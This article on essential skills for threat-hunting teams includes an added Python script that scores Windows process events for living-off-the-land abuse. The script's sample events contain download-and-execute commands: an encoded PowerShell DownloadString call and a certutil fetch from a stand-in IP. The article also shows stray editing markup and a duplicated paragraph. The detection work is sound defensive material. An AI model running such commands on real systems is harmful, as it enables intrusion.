4 Essential Skills for Cyber Threat-Hunting Teams

The rise of stealthy cybersecurity threats demands a new set of skills. So, what should CISOs look for when hiring?

Written by Mike Mitchell
Published on Jul. 22, 2025
Summary: The rise of stealthy cyber threats such as living off the land (LOTL) attacks has made elite threat-hunting teams a top CISO priority. Key skills include an offensive mindset, security architecture expertise, data analysis and deep knowledge of the organization's own systems.

The cybersecurity talent gap is nothing new, and it’s not going away anytime soon. The global shortage — the difference between the number of current workers and that required to adequately protect the world’s organizations — has grown to 4.8 million, up from 3.4 million in 2022.

But the problem goes far beyond simply finding and hiring people, because the threat landscape keeps getting more complex: Advanced persistent threat (APT) groups and well-resourced ransomware crews constantly change their behavior to avoid discovery, which gives them all the time they need to compromise networks. Difficult-to-detect living off the land (LOTL) techniques, in which attackers abuse legitimate, built-in system tools (command interpreters, administrative utilities, download helpers) to "blend into" routine network activity and execute code, have emerged as the top tactic for nation-state adversaries, now accounting for 75.6 percent of their attacks, according to the SANS 2025 Threat Hunting Survey. The same survey links LOTL to 49 percent of ransomware and 44.5 percent of financially motivated industrial-espionage incidents.

This trend, along with rising geopolitical tension, an expanding and complex regulatory environment and calls for more proactive cyber risk management, has elevated network defense to a leading board priority.


Worse Threats Need Better Hunters

That’s why modern chief information security officers (CISOs) are increasingly focused on adding highly qualified, behavior-focused threat hunters to their teams. By applying threat intelligence to user activity and anomalous patterns, threat hunters catch attacks that often evade automated detection tools. They are also adept at running formalized, repeatable searches for the adversary tactics, techniques and procedures (TTPs) that represent the greatest risk.

Frankly, CISOs must recruit threat hunters who are several cuts above their standard cybersecurity peers, just as the military and law enforcement depend on members with elite skills to staff their special units.

Amid the growing demand for this caliber of professional, we’re also seeing notable changes in staffing patterns, with 58 percent of organizations managing threat hunting internally, up from 46 percent a year ago. In fact, less than a third of companies fully outsource their threat hunting, down from 37 percent in 2024.

This puts more pressure on CISOs to land the right talent. Sure, they can invest in artificial intelligence (AI) to handle various duties. But AI alone cannot match people at acquiring deep knowledge of an organization’s structure while interpreting system, tool and human behavior in context across host, network and cloud environments. Threat hunting requires industry-specific expertise and a thorough understanding of the organization’s security processes and controls, along with its privileged-access model, network layout, architecture, applications, defensive technologies and incident response functions.


What Skills Should Your Cybersecurity Team Have?

Beyond that, what essential skills should CISOs look for when recruiting in-house threat hunters? We recommend the following four.

4 Essential Skills for Cyber Threat Hunters

  • An offensive mindset.
  • Security architecture savvy.
  • Data analysis skills.
  • Organizational and core systems knowledge.

An Offensive Mindset

Threat hunting, by definition, requires assertive, proactive team members who take pride in mastering the details of how attackers abuse systems and bypass controls. Because they think like the adversary, they know where threats are likely to hide and which options they have for stopping them in their tracks.

Security Architecture Savvy

This is about acquiring deep knowledge and knowing how to apply it. Threat hunters need a detailed understanding of the organization’s architecture, networks and security controls, because unusual behavior only stands out against a clear picture of what normal looks like.
</gre_replace>
<gr_replace lines="55" cat="clarify" orig="Data analysis plays">
Data analysis plays a critical role in identifying patterns and anomalies in the vast data sets produced by endpoint and network logs. This skill lets threat hunters work through large volumes of events and query results and separate malicious activity from the normal background.

Data Analysis Skills

Data analysis plays a critical role in identifying patterns and anomalies from vast data sets of endpoint and network logs. This skill helps threat hunters navigate extensive data sets and results to identify maliciousness from normal activity.
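The LOTL problem described earlier and the data analysis skill described here come together in a hunt like the following. This is an added example, not code from the article or from SANS: it scores constructed Windows process-creation events (Sysmon Event ID 1 style fields, invented for the example) by three signals a hunter would combine: arguments that are rare in routine administration for a given built-in tool, an unusual parent process, and how rare the (host, user, image) combination is against a baseline. The tool and argument list is an illustrative subset, not an exhaustive catalogue, and the host names, users and IP address are made up.

```python
"""Hunting for living-off-the-land (LOTL) activity in process-creation events.

Added example for this article; the events below are constructed, not real
telemetry, and the tool/argument patterns are an illustrative subset.
"""
import base64
import re
from collections import Counter
from typing import Dict, List

# Built-in Windows tools commonly abused, with argument patterns that are rare
# in routine administration. Illustrative, not exhaustive.
SUSPICIOUS_ARGS = {
    "powershell.exe": [r"-enc(odedcommand)?\b", r"-w(indowstyle)?\s+hidden",
                       r"downloadstring", r"\biex\b", r"frombase64string"],
    "certutil.exe": [r"-urlcache", r"-decode\b"],
    "mshta.exe": [r"https?://", r"javascript:", r"vbscript:"],
    "regsvr32.exe": [r"/i:https?://", r"scrobj\.dll"],
    "rundll32.exe": [r"javascript:", r"https?://"],
    "bitsadmin.exe": [r"/transfer"],
    "wmic.exe": [r"process\s+call\s+create"],
}

# Parents that rarely spawn interpreters or download tools legitimately.
ODD_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "w3wp.exe", "mshta.exe"}

ENC_RE = re.compile(r"-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload (UTF-16LE base64), or ''."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return ""


def hunt(events: List[Dict[str, str]], rare_threshold: int = 2) -> List[Dict]:
    """Score each event; higher means more worth an analyst's time.

    Rarity is measured against the supplied batch for simplicity. In a real
    hunt the baseline comes from weeks of history, not the batch under review.
    """
    baseline = Counter((e["host"], e["user"], e["image"].lower()) for e in events)
    findings = []
    for e in events:
        image, parent = e["image"].lower(), e["parent"].lower()
        # Decode -enc payloads so that obfuscated arguments are matched too.
        decoded = decode_encoded_command(e["cmdline"]) if image == "powershell.exe" else ""
        text = e["cmdline"].lower() + " " + decoded.lower()
        score, reasons = 0, []
        for pat in SUSPICIOUS_ARGS.get(image, []):
            if re.search(pat, text):
                score += 2
                reasons.append(f"suspicious argument /{pat}/")
                break  # one hit is enough for scoring; the reason aids triage
        if parent in ODD_PARENTS:
            score += 2
            reasons.append(f"unusual parent {parent}")
        if baseline[(e["host"], e["user"], image)] < rare_threshold:
            score += 1
            reasons.append("rare (host, user, image) combination")
        if score:
            findings.append({**e, "score": score, "reasons": reasons, "decoded": decoded})
    return sorted(findings, key=lambda f: -f["score"])


def _enc(ps: str) -> str:
    """Encode a command the way PowerShell's -EncodedCommand expects it."""
    return base64.b64encode(ps.encode("utf-16le")).decode()


# Constructed sample events (hosts, users and the IP address are invented).
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "alice", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
    {"host": "WS01", "user": "alice", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Service Spooler"},
    {"host": "WS01", "user": "alice", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"host": "WS01", "user": "alice", "parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe C:\\Program Files\\Vendor\\setup.hta"},
    {"host": "WS07", "user": "bob", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _enc(
         "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')")},
    {"host": "SRV02", "user": "svc_web", "parent": "w3wp.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://198.51.100.7/x.txt C:\\Windows\\Temp\\x.exe"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f["score"], f["host"], f["user"], f["image"], "|", "; ".join(f["reasons"]))
        if f["decoded"]:
            print("    decoded:", f["decoded"])
```

Running it surfaces the Word-spawned PowerShell on WS07 and the web-server-spawned certutil download on SRV02 at the top, while alice's routine PowerShell use on WS01 is never listed because her baseline makes it unremarkable. The lone mshta launch scores only on rarity, which is the kind of low-score item a hunter checks quickly and then either baselines or escalates.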

Organizational and Core Systems Knowledge

A long-time industry veteran can prove valuable here, especially someone who helped build the very technologies the team is defending. This knowledge also deepens over time through the hunting itself, as hunters explore the organization’s logging and visibility and learn what normal activity looks like in each environment.


Step Up Your Threat Hunting

Let’s face it: The bad guys are going to keep stepping up their game. They’re always looking for the next exploitable entry point, and they will use AI and other high-powered tooling to carry out their attacks more efficiently and effectively.

In response, CISOs need more than just good technicians. They must assemble in-house talent that combines the deep knowledge of an obsessed researcher with the proactive cunning of a relentless bounty hunter. That’s when a cyber team transforms into a Special Forces/SWAT-level A Team.
